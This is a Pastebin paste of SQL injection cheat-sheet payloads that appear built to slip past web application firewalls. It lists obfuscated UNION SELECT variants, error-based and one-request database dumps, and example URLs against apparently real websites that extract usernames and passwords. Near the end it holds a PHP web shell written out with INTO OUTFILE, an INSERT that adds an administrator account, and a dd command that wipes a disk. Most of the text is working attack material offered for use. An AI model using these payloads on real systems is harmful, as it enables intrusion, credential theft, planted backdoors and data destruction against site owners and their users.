API tools faq
paste
Advertisement
Kyfx

Bypass For Manual Injecting

Kyfx
Jun 26th, 2015
540
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.10 KB | None | 0 0
raw download clone embed print report
  1. SQLI Injction WAF Bypass Methods With Details
  2. --'- : +--+ / : -- - : --+- : /*
  3. ) order by 1-- -
  4. ') order by 1-- -
  5. ')order by 1%23%23
  6. %')order by 1%23%23
  7. Null' order by 100--+
  8. Null' order by 9999--+
  9. ')group by 99-- -
  10. 'group by 119449-- -
  11. 'group/**/by/**/99%23%23
  12. union select ByPassing method
  13. +union+distinct+select+
  14. +union+distinctROW+select+
  15. /**//*!12345UNION SELECT*//**/
  16. /**//*!50000UNION SELECT*//**/
  17. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  18. +/*!u%6eion*/+/*!se%6cect*/+
  19. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  20. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  21. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  22. union /*!50000%53elect*/
  23. %55nion %53elect
  24. +--+Union+--+Select+--+
  25. +UnIoN/*&a=*/SeLeCT/*&a=*/
  26. id=1+’UnI”On’+'SeL”ECT’
  27. id=1+'UnI'||'on'+SeLeCT'
  28. UnIoN SeLeCt CoNcAt(version())--
  29. uNiOn aLl sElEcT
  30. uUNIONnion all sSELECTelect
  31. ===================================================================================================================================
  32. :: Buffer Overflow ::
  33. ===================================================================================================================================
  34. +And(select 1)=(select 0×414)+union+select+1–
  35. +And(select 1)=(select 0xAAAA)+union+select+1–
  36. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+
  37. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  38. ==================================================================================================================================
  39. :: 400 Bad Request ::
  40. ==================================================================================================================================
  41. –+%0A
  42. union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
  43. ==================================================================================================================================
  44. null the parameter
  45. ==================================================================================================================================
  46. id=-1
  47. id=null
  48. id=1+and+false+
  49. id=9999
  50. id=1 and 0
  51. id==1
  52. id=(-1)
  53. =======================================================================================================================================
  54. Group_Concat
  55. =======================================================================================================================================
  56. Group_Concat
  57. group_concat()
  58. /*!group_concat*/()
  59. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  60. group_concat(,0x3c62723e)
  61. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  62. CoNcAt()
  63. CONCAT(DISTINCT Version())
  64. concat(,0x3a,)
  65. concat%00()
  66. %00CoNcAt()
  67. /*!50000cOnCat*/(/*!Version()*/)
  68. /*!50000cOnCat*/
  69. /**//*!12345cOnCat*/(,0x3a,)
  70. concat_ws()
  71. concat(0x3a,,0x3c62723e)
  72. /*!concat_ws(0x3a,)*/
  73. concat_ws(0x3a3a3a,version()
  74. CONCAT_WS(CHAR(32,58,32),version(),)
  75. REVERSE(tacnoc)
  76. binary(version())
  77. uncompress(compress(version()))
  78. aes_decrypt(aes_encrypt(version(),1),1)
  79. ====================================================================================================================================
  80. To appear column numbr in page put after id
  81. ====================================================================================================================================
  82. id=1+and+1=0+union+select+1,2,3,4,5,6
  83. +AND+1=0
  84. /*!aND*/ 1 like 0
  85. +/*!and*/+1=0
  86. +and+2>3+
  87. +and(1)=(0)
  88. and (1)!=(0)
  89. +div+0
  90. Having+1=0
  91. ===================================================================================================================================
  92. function ByPassing
  93. ===================================================================================================================================
  94. unhex(hex(value))
  95. cast(value as char)
  96. uncompress(compress(version()))
  97. cast(version() as char)
  98. aes_decrypt(aes_encrypt(version(),1),1)
  99. binary(version())
  100. convert(value using ascii)
  101. ===================================================================================================================================
  102. avoid source page injection
  103. ===================================================================================================================================
  104. concat(?”>,
  105. ,@@version,?
  106. “>
  107. ?
  108. injection
  109. concat(0x223e,@@version)
  110. concat(0x273e27,version(),0x3c212d2d)
  111. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  112. concat(0x223e,@@version,0x3c696d67207372633d22)
  113. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
  114. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
  115. concat(‘’,@@version,’’)
  116. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  117. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  118. ===================================================================================================================================
  119. get version – DB_NAME – user – HOST_NAME – datadir
  120. ===================================================================================================================================
  121. version()
  122. convert(version() using latin1)
  123. unhex(hex(version()))
  124. @@GLOBAL.VERSION
  125. (substr(@@version,1,1)=5) :: 1 true 0 fals
  126. # like #
  127. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
  128. ==================================================================================================================================
  129. +and substring(version(),1,1)=4
  130. +and substring(version(),1,1)=5
  131. +and substring(version(),1,1)=9
  132. +and substring(version(),1,1)=10
  133. id=1 /*!50094aaaa*/ error
  134. id=1 /*!50095aaaa*/ no error
  135. id=1 /*!50096aaaa*/ error
  136. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  137. id=1 /*!40123 1=1*/–+- no error
  138. id=1 /*!40122rrrr*/ no error
  139. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  140. =================================================================================================================================
  141. DB_NAME()
  142. =================================================================================================================================
  143. @@database
  144. database()
  145. id=vv()
  146. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
  147. http://www.marinaplast.com/page.php?id=vv()
  148. @@user
  149. user()
  150. user_name()
  151. system_user()
  152. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
  153. HOST_NAME()
  154. @@hostname
  155. @@servername
  156. SERVERPROPERTY()
  157. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
  158. @@datadir
  159. datadir()
  160. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
  161. ASPX
  162. and 1=0/@@version
  163. ‘ and 1=0/@@version;–
  164. ‘) and 1=@@version–
  165. and 1=0/user;–
  166. Requested method
  167. [DUMP DB in 1 Request]
  168. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  169. (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  170. ===================================================================================================================================
  171. [DUMP DB in 1 Request improve]
  172. ===================================================================================================================================
  173. (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  174. like
  175. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
  176. ===================================================================================================================================
  177. #2#
  178. ===================================================================================================================================
  179. method like DUMP DB in 1 Request
  180. ===================================================================================================================================
  181. concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  182. like
  183. http://www.mishnetorah.com/shop/details.php…(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  184. ===================================================================================================================================
  185. #3#
  186. ===================================================================================================================================
  187. databases
  188. (select+count(schema_name) +from+information_schema.schemata)
  189. # like #
  190. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  191. tables
  192. (select+count(table_name) +from+information_schema.tables)
  193. # like #
  194. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  195. columns
  196. (select+count(column_name) +from+information_schema.columns)
  197. # like #
  198. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  199. ===================================================================================================================================
  200. #4#
  201. ===================================================================================================================================
  202. show the table with all her columns
  203. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  204. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  205. like
  206. http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
  207. ===================================================================================================================================
  208. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  209. ===================================================================================================================================
  210. feltered requested
  211. # tables #
  212. group_concat(/*!table_name*/)
  213. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  214. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  215. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  216. ===================================================================================================================================
  217. # columns #
  218. ===================================================================================================================================
  219. group_concat(/*!column_name*/)
  220. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  221. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  222. /*!froM*/ table– -
  223. ===================================================================================================================================
  224. #6#
  225. ===================================================================================================================================
  226. bypass method
  227. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  228. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  229. like
  230. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 –
  231. ===================================================================================================================================
  232. #7#
  233. ===================================================================================================================================
  234. bypass method
  235. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  236. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  237. like
  238. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–
  239. ===================================================================================================================================
  240. [+] Union Select:
  241. ===================================================================================================================================
  242. union /*!select*/+
  243. union/**/select/**/
  244. /**/union/**/select/**/
  245. /**/union/*!50000select*/
  246. /**//*!12345UNION SELECT*//**/
  247. /**//*!50000UNION SELECT*//**/
  248. /**/uniUNIONon/**/selSELECTect/**/
  249. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  250. /**//*!union*//**//*!select*//**/
  251. /**/UNunionION/**/SELselectECT/**/
  252. /**//*UnIOn*//**//*SEleCt*//**/
  253. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  254. /**/UNunionION/**/all/**/SELselectECT/**/
  255. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  256. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  257. uni
  258. %20union%20/*!select*/%20
  259. union%23aa%0Aselect
  260. union+distinct+select+
  261. union+distinctROW+select+
  262. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  263. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  264. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  265. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  266. /*!u%6eion*/+/*!se%6cect*/+
  267. 1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  268. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  269. union /*!50000%53elect*/
  270. +%2F**/+Union/*!select*/
  271. %55nion %53elect
  272. +–+Union+–+Select+–+
  273. +UnIoN/*&a=*/SeLeCT/*&a=*/
  274. uNiOn aLl sElEcT
  275. uUNIONnion all sSELECTelect
  276. union(select(1),2,3)
  277. union (select 1111,2222,3333)
  278. union (/*!/**/ SeleCT */ 11)
  279. %0A%09UNION%0CSELECT%10NULL%
  280. /*!union*//*–*//*!all*//*–*//*!select*/
  281. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  282. union+sel%0bect
  283. +uni*on+sel*ect+
  284. +‪#‎1q‬%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  285. union(select (1),(2),(3),(4),(5))
  286. UNION(SELECT(column)FROM(table))
  287. id=1+’UnI”On’+’SeL”ECT’
  288. id=1+’UnI’||’on’+SeLeCT’
  289. union select 1–+%0A,2–+%0A,3–+%0A etc ….
  290. ===================================================================================================================================
  291. [+] Buffer overflow:
  292. ===================================================================================================================================
  293. +And(select 1)=(select 0×414)+union+select+1–
  294. +And(select 1)=(select 0xAAAA)+union+select+1–
  295. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  296. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  297. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+
  298. ===================================================================================================================================
  299. [+] Group Concat:
  300. ===================================================================================================================================
  301. Group_Concat
  302. group_concat()
  303. /*!group_concat*/()
  304. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  305. group_concat(,0x3c62723e)
  306. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  307. CoNcAt()
  308. CONCAT(DISTINCT Version())
  309. concat(,0x3a,)
  310. concat%00()
  311. %00CoNcAt()
  312. /*!50000cOnCat*/(/*!Version()*/)
  313. /*!50000cOnCat*/
  314. /**//*!12345cOnCat*/(,0x3a,)
  315. concat_ws()
  316. concat(0x3a,,0x3c62723e)
  317. /*!concat_ws(0x3a,)*/
  318. concat_ws(0x3a3a3a,version()
  319. CONCAT_WS(CHAR(32,58,32),version(),)
  320. ===================================================================================================================================
  321. ERORE BASED
  322. ===================================================================================================================================
  323. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
  324. Database
  325. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  326. Table_name
  327. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  328. Columns
  329. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  330. extract date
  331. http://www.aliqbalschools.org/index.php… and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  332. Notice the limit function in the query
  333. A website can have more than 2 two databases, so increase the limit until you find all database names
  334. Example: limit 0,1 or limit 1,1 or limit 2,1
  335. ===================================================================================================================================
  336. Differences:
  337. Error Based Query for Database Extraction:
  338. ===================================================================================================================================
  339. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  340. Double Query for Database Extraction:
  341. and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  342. information_schema.tables group by x)a) and 1=1
  343. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  344. concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  345. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  346. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  347. concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
  348. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  349. information_schema.tables group by x)a) and 1
  350. ===================================================================================================================================
  351. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  352. ===================================================================================================================================
  353. Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
  354. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  355. I’d say using concat(0xY)
  356. Y being ‘’ in hex
  357. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)
  358. http://zerocoolhf.altervista.org/level2.php…–+
  359. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)
  360. =113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
  361. injection in sql database addd new user
  362. INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'[email protected]’)
  363. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  364. CHALLENGES
  365. Code:
  366. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+-
  367. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
  368. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
  369. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
  370. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
  371. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  372. null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
  373. ===================================================================================================================================
  374. Error Based:
  375. ===================================================================================================================================
  376. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  377. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  378. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
  379. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -
  380. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  381. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  382. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x
  383. or 1=convert(int,(@@version))-
  384. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  385. +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  386. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-
  387. ===================================================================================================================================
  388. WAF BYPASS BY TOTTI
  389. ===================================================================================================================================
  390. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())– -
  391. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– -
  392. ===================================================================================================================================
  393. WUBI – 1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–
  394. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  395. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  396. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  397. ===================================================================================================================================
  398. +and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
  399. ===================================================================================================================================
  400. http://zerofreak.blogspot.it/…/tutorial-by-zer0freak-zer0fr…
  401. http://www.websec.ca/kb/sql_injection
  402. http://www.hellboundhackers.org/…/862-mysql-injection-compl…
  403. ===================================================================================================================================
  404. test
  405. http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  406. …………………………………..
  407. http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
  408. SELECT “ system($_REQUEST['cmd']); ?>”
  409. INTO OUTFILE “full/path/here/cmd.php”
  410.  
  411. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%5
  412. ------------------------------Best Bypass WAF------------------------------------
  413. [~] order by [~]
  414. /**/ORDER/**/BY/**/
  415. /*!order*/+/*!by*/
  416. /*!ORDER BY*/
  417. /*!50000ORDER BY*/
  418. /*!50000ORDER*//**//*!50000BY*/
  419. /*!12345ORDER*/+/*!BY*/
  420. [~] UNION select [~]
  421. /*!00000Union*/ /*!00000Select*/
  422. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  423. %55nion %53elect
  424. %55nion(%53elect 1,2,3)-- -
  425. +union+distinct+select+
  426. +union+distinctROW+select+
  427. /**//*!12345UNION SELECT*//**/
  428. /**//*!50000UNION SELECT*//**/
  429. /**/UNION/**//*!50000SELECT*//**/
  430. /*!50000UniON SeLeCt*/
  431. union /*!50000%53elect*/
  432. + #?uNiOn + #?sEleCt
  433. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  434. /*!%55NiOn*/ /*!%53eLEct*/
  435. /*!u%6eion*/ /*!se%6cect*/
  436. +un/**/ion+se/**/lect
  437. uni%0bon+se%0blect
  438. %2f**%2funion%2f**%2fselect
  439. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  440. REVERSE(noinu)+REVERSE(tceles)
  441. /*--*/union/*--*/select/*--*/
  442. union (/*!/**/ SeleCT */ 1,2,3)
  443. /*!union*/+/*!select*/
  444. union+/*!select*/
  445. /**/union/**/select/**/
  446. /**/uNIon/**/sEleCt/**/
  447. +%2F**/+Union/*!select*/
  448. /**//*!union*//**//*!select*//**/
  449. /*!uNIOn*/ /*!SelECt*/
  450. +union+distinct+select+
  451. +union+distinctROW+select+
  452. uNiOn aLl sElEcT
  453. UNIunionON+SELselectECT
  454. /**/union/*!50000select*//**/
  455. 0%a0union%a0select%09
  456. %0Aunion%0Aselect%0A
  457. %55nion/**/%53elect
  458. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  459. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  460. %0A%09UNION%0CSELECT%10NULL%
  461. /*!union*//*--*//*!all*//*--*//*!select*/
  462. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  463. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  464. +UnIoN/*&a=*/SeLeCT/*&a=*/
  465. union+sel%0bect
  466. +uni*on+sel*ect+
  467. +‪#‎1q‬%0Aunion all#qa%0A#%0Aselect
  468. union(select (1),(2),(3),(4),(5))
  469. UNION(SELECT(column)FROM(table))
  470. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  471. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  472. union(select(1),2,3)
  473. union (select 1111,2222,3333)
  474. uNioN (/*!/**/ SeleCT */ 11)
  475. union (select 1111,2222,3333)
  476. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  477. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  478. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  479. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  480. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  481. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  482. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  483. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  484. /union\sselect/g
  485. /union\s+select/i
  486. /*!UnIoN*/SeLeCT
  487. +UnIoN/*&a=*/SeLeCT/*&a=*/
  488. +uni>on+sel>ect+
  489. +(UnIoN)+(SelECT)+
  490. +(UnI)(oN)+(SeL)(EcT)
  491. +’UnI”On’+'SeL”ECT’
  492. +uni on+sel ect+
  493. +/*!UnIoN*/+/*!SeLeCt*/+
  494. /*!u%6eion*/ /*!se%6cect*/
  495. uni%20union%20/*!select*/%20
  496. union%23aa%0Aselect
  497. /**/union/*!50000select*/
  498. /^.*union.*$/ /^.*select.*$/
  499. /*union*/union/*select*/select+
  500. /*uni X on*/union/*sel X ect*/
  501. +un/**/ion+sel/**/ect+
  502. +UnIOn%0d%0aSeleCt%0d%0a
  503. UNION/*&test=1*/SELECT/*&pwn=2*/
  504. un?<ion sel="">+un/**/ion+se/**/lect+
  505. +UNunionION+SEselectLECT+
  506. +uni%0bon+se%0blect+
  507. %252f%252a*/union%252f%252a /select%252f%252a*/
  508. /%2A%2A/union/%2A%2A/select/%2A%2A/
  509. %2f**%2funion%2f**%2fselect%2f**%2f
  510. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  511. /*!UnIoN*/SeLecT+
  512. [~] information_schema.tables [~]
  513. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  514. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  515. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  516. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  517. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  518. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  519. [~] concat() [~]
